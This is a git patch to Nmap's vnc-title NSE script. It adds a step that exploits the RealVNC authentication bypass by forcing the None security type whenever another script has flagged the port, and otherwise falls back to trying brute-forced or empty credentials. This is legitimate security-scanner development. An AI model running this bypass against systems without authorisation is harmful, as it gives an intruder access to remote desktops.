From 76f7c48c1793555676ec44fe8dc9f14fecc19625 Mon Sep 17 00:00:00 2001 From: dmiller Date: Fri, 3 Mar 2017 19:39:57 +0000 Subject: [PATCH] Allow vnc-title to exploit RealVNC auth bypass if discovered. --- scripts/vnc-title.nse | 60 ++++++++++++++++++++++++++++++++----------- 1 file changed, 45 insertions(+), 15 deletions(-) diff --git a/scripts/vnc-title.nse b/scripts/vnc-title.nse index 14c892daa..f0ea2cae7 100644 --- a/scripts/vnc-title.nse +++ b/scripts/vnc-title.nse @@ -13,6 +13,9 @@ license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"intrusive", "discovery"} --- +-- @see vnc-brute +-- @see realvnc-auth-bypass +-- -- @output -- | vnc-title: -- | name: LibVNCServer @@ -24,7 +27,7 @@ categories = {"intrusive", "discovery"} -- 1024 x 768 -- 24 -dependencies = {"vnc-brute"} +dependencies = {"vnc-brute", "realvnc-auth-bypass"} portrule = shortport.port_or_service( {5900, 5901, 5902} , "vnc", "tcp", "open") @@ -42,25 +45,52 @@ action = function(host, port) status, data = v:handshake() if ( not(status) ) then return fail(data) end - local c = creds.Credentials:new(creds.ALL_DATA, host, port) - local tried = 0 - for cred in c:getCredentials(creds.State.VALID + creds.State.PARAM) do - tried = tried + 1 - stdnse.debug1("Trying creds: %s:%s", cred.user, cred.pass) - status, data = v:login(cred.user, cred.pass) + -- If this doesn't work, start over. + status = false + local reg = host.registry["realvnc-auth-bypass"] + if reg and reg[port.number] then + stdnse.debug1("Trying RealVNC Auth Bypass") + -- Force None auth type and try to init to exploit + v:sendSecType(vnc.VNC.sectypes.NONE) + status, data = v:login_none() if status then - break + status, data = v:client_init(true) + if not status then + stdnse.debug1("RealVNC Auth Bypass failed.") + end + end + if not status then + -- clean up and start over + v:disconnect() + status, data = v:connect() + if not status then return fail(data) end + status, data = v:handshake() + if not status then return fail(data) end + -- Be sure to let the regular login stuff have a try + status = false end end - if tried < 1 then - --worth trying a None-type login - stdnse.debug1("Trying empty creds, for None security type") - status, data = v:login("", "") - end if not status then - return fail(("Couldn't log in: %s"):format(data)) + local c = creds.Credentials:new(creds.ALL_DATA, host, port) + local tried = 0 + for cred in c:getCredentials(creds.State.VALID + creds.State.PARAM) do + tried = tried + 1 + stdnse.debug1("Trying creds: %s:%s", cred.user, cred.pass) + status, data = v:login(cred.user, cred.pass) + if status then + break + end + end + if tried < 1 then + --worth trying a None-type login + stdnse.debug1("Trying empty creds, for None security type") + status, data = v:login("", "") + end + if not status then + return fail(("Couldn't log in: %s"):format(data)) + end + status, data = v:client_init(true) end - status, data = v:client_init(true) if status then local out = stdnse.output_table() out.name = data.name